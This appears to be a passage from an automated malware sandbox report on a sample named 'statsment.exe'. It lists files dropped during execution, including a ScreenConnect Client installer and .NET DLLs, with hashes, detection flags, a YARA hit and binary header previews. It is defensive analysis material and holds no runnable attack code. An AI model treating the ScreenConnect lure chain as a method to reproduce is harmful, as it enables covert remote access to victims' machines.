                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                    Process:C:\Users\user\Desktop\statsment.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):321
                                                                    Entropy (8bit):5.36509199858051
                                                                    Encrypted:false
                                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                    MD5:1CF2352B684EF57925D98E766BA897F2
                                                                    SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                    SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                    SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                    Malicious:true
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                    Category:dropped
                                                                    Size (bytes):1086792
                                                                    Entropy (8bit):7.793516535218678
                                                                    Encrypted:false
                                                                    SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                                    MD5:30CA21632F98D354A940903214AE4DE1
                                                                    SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                                    SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                                    SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):234
                                                                    Entropy (8bit):4.977464602412109
                                                                    Encrypted:false
                                                                    SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                    MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                    SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                    SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                    SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                    Malicious:false
                                                                    Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):4.62694170304723
                                                                    Encrypted:false
                                                                    SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                    MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                    SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                    SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                    SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):36864
                                                                    Entropy (8bit):4.340550904466943
                                                                    Encrypted:false
                                                                    SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                    MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                    SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                    SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                    SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):57344
                                                                    Entropy (8bit):4.657268358041957
                                                                    Encrypted:false
                                                                    SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                    MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                    SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                    SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                    SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):176128
                                                                    Entropy (8bit):5.775360792482692
                                                                    Encrypted:false
                                                                    SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                    MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                    SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                    SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                    SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):548864
                                                                    Entropy (8bit):6.031251664661689
                                                                    Encrypted:false
                                                                    SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                    MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                    SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                    SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                    SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11776
                                                                    Entropy (8bit):5.267782165666963
                                                                    Encrypted:false
                                                                    SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                                    MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                                    SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                                    SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                                    SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0..&..........&E... ...`....... ..............................t.....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...,%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1721856
                                                                    Entropy (8bit):6.639136400085158
                                                                    Encrypted:false
                                                                    SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                    MD5:9F823778701969823C5A01EF3ECE57B7
                                                                    SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                    SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                    SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                    Process:C:\Users\user\Desktop\statsment.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                    Category:dropped
                                                                    Size (bytes):13422592
                                                                    Entropy (8bit):7.966820923160687
                                                                    Encrypted:false
                                                                    SSDEEP:196608:h53JLR3LGMLiW35j53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53Jd:bTiuZTXTtTPTkT3T
                                                                    MD5:7E20F46535D83264E94CA0F03D147867
                                                                    SHA1:96986D5F0CBCDE8141BA9A41721702154FF7B8C8
                                                                    SHA-256:307907BF34B356B6C6090428EE86BD9EA0E05C4165455403F2FC1BDF26AF6F9E
                                                                    SHA-512:3E05B66131708F2378061B4ED565DDD1D2DAF91FEC472FB28E2EE0403DD3EDFF017E64DCBBD28CA134F2B303A80345852785FE6D4248CF1B92068CF63908DA7A
                                                                    Malicious:false
                                                                    Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                    Category:dropped
                                                                    Size (bytes):13422592
                                                                    Entropy (8bit):7.966820923160687
                                                                    Encrypted:false
                                                                    SSDEEP:196608:h53JLR3LGMLiW35j53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53Jd:bTiuZTXTtTPTkT3T
                                                                    MD5:7E20F46535D83264E94CA0F03D147867
                                                                    SHA1:96986D5F0CBCDE8141BA9A41721702154FF7B8C8
                                                                    SHA-256:307907BF34B356B6C6090428EE86BD9EA0E05C4165455403F2FC1BDF26AF6F9E
                                                                    SHA-512:3E05B66131708F2378061B4ED565DDD1D2DAF91FEC472FB28E2EE0403DD3EDFF017E64DCBBD28CA134F2B303A80345852785FE6D4248CF1B92068CF63908DA7A
                                                                    Malicious:false
                                                                    Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                    Category:dropped
                                                                    Size (bytes):13422592
                                                                    Entropy (8bit):7.966820923160687
                                                                    Encrypted:false
                                                                    SSDEEP:196608:h53JLR3LGMLiW35j53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53Jd:bTiuZTXTtTPTkT3T
                                                                    MD5:7E20F46535D83264E94CA0F03D147867
                                                                    SHA1:96986D5F0CBCDE8141BA9A41721702154FF7B8C8
                                                                    SHA-256:307907BF34B356B6C6090428EE86BD9EA0E05C4165455403F2FC1BDF26AF6F9E
                                                                    SHA-512:3E05B66131708F2378061B4ED565DDD1D2DAF91FEC472FB28E2EE0403DD3EDFF017E64DCBBD28CA134F2B303A80345852785FE6D4248CF1B92068CF63908DA7A
                                                                    Malicious:false
                                                                    Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):431081
                                                                    Entropy (8bit):6.617533408935632
                                                                    Encrypted:false
                                                                    SSDEEP:6144:luH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqv/ssu:luH2anwohwQUv5uH2anwohwQUv/ssu
                                                                    MD5:B1BF38D2373B0759961C5C2E384AC60F
                                                                    SHA1:D83CFF608057EA47C3C44F7AF382928203E202ED
                                                                    SHA-256:3876FDC1A558630E0A6F184DD45D21C2C925853D6BE6A0746D7E44DF04DEBDA6
                                                                    SHA-512:2C9CEE510F0D22099998F8EAAAFAE34BE6EC135D46F0EF453C9AB1AAD9EDA9365A2E37441143A7FA0F5818828A70E953372451ED1C1E7B5E6728FDA82D835D34
                                                                    Malicious:false
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSID418.tmp, Author: Joe Security
                                                                    Preview:...@IXOS.@.....@...Y.@.....@.....@.....@.....@.....@......&.{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}^.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}f.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}c.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):207360
                                                                    Entropy (8bit):6.573348437503042
                                                                    Encrypted:false
                                                                    SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                    MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                    SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                    SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                    SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):207360
                                                                    Entropy (8bit):6.573348437503042
                                                                    Encrypted:false
                                                                    SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                    MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                    SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                    SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                    SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.1614974116863155
                                                                    Encrypted:false
                                                                    SSDEEP:12:JSbX72FjiSAGiLIlHVRpMh/7777777777777777777777777vDHF8+l7p3Xl0i8Q:JHQI5c9V6F
                                                                    MD5:685383AAC503450A56BE9C689FC62050
                                                                    SHA1:AB1E618889BE60DE712CD4BA15B3148F45BDA035
                                                                    SHA-256:09ED6CAF9AAE9F445828A63B0007736F88E88A22B91183CE71DA6CCB2965A861
                                                                    SHA-512:69AD78F33951FD6CC1FF5A20D60D7EA4AC0D165191B383C549912D672E9A174AC93BF38D0B1D9A44D9FD45426B1C879CB04A4490D4FDC19B02CA5C5F9F3C1216
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.7964183569782501
                                                                    Encrypted:false
                                                                    SSDEEP:48:I8PhDuRc06WX4unT5v9ptcqcq56AduNSiA9EdZq+ommXrz4ao8rmAduNSID:XhD1enTHppYfaEdwLmm34D
                                                                    MD5:5B8A65C0D429AA7ED5920066362E617B
                                                                    SHA1:6BABEEBFFA878BDBE934FB6214FA1B9E28845A1A
                                                                    SHA-256:C4F8E8799093B8B1FE276C988161422295B1E7E76CA49B6B05C10D49E7EBB0D9
                                                                    SHA-512:2FF13882D99608AD5B3CC97255F87377A80B4C030D7A8EB80A5219A51D4FE619B01E671529B717313F07324D89C43C4A1699DF1E1098507832EB5C7ABF3E1CF2
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel
                                                                    Category:dropped
                                                                    Size (bytes):7668
                                                                    Entropy (8bit):7.864444854228408
                                                                    Encrypted:false
                                                                    SSDEEP:192:NN78fxDBmgwVRjuzFN78fxDBmgwVRjuzFN78fxDBmgwVRjuzc:NN78dB742N78dB742N78dB74d
                                                                    MD5:55A6B0132343F5FC425515F0E29A5A53
                                                                    SHA1:CC8FE5C184EBB14AD6D835D8E743F4FC2678CB10
                                                                    SHA-256:A6663FB9874ABA9B9C1958D2D17470B73E1C95621A503454B2D0F941F989EAA6
                                                                    SHA-512:4F57298141165351CCE82CCCD9CAE456591253C9BEB753645D92B73D933F8405CD22011FC0E8C488A2CD3D3B54C7AF327F2869432EE92C1C41B0F4474D6C6BE9
                                                                    Malicious:false
                                                                    Preview:..................6... .......... ...00...............PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.m#x....X.rYn....R_.ds...*.*......V..x[$]..}.*..b...". ...,....*|.F`.....E[`\6...G.m..$.K...IxAb..^."....@.^..G....bK.....F.+.E.*..p......2WBk......8...p......_u.mR.6.......xs.....jHX.)l....KA..F...u_}.G.pF.`.i....K..JQ.C..cc..[..-06.d{...%TtG..'.....9.W5W.~)..Qlx.d.gT....gX.#L..4{......cG..h..$...ie.....W..)X...#o..dku..[.VQp..c?...........)..+w.p.H....I...:...r...6?....V...{.R...?.w..i......sC[..R.t!_v.A.....-kzL.8...d.(..6I.....&.R..1.....p.?.Vt..@>^....{p.s.[..c9.k~k.B....(.......%=........x6.6*:..Vu.. ......".;g..f....o}..+..n.w..%.j.0...X:.^...o....$.8@M]B..J..R.. ..a....n.<.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):432221
                                                                    Entropy (8bit):5.37517640284146
                                                                    Encrypted:false
                                                                    SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauo:zTtbmkExhMJCIpErZ
                                                                    MD5:AFB0173B8E32C30CE229371B4BC3E84B
                                                                    SHA1:0740AFE6BAC4F6597B59F686A6D61AA2C728CF03
                                                                    SHA-256:7DC3DFDC59D2D4DF6B7617D0C0BDDB294477065B1FEC26855CDD317179B1A640
                                                                    SHA-512:445C62681B9E48628EB2F90A1AC8BB1B07D038E893AB62F60E0452197D38876C4361934A0DCC93CE983739515FDC95440F0574B6E89D3B764E868E247F5A10A2
                                                                    Malicious:false
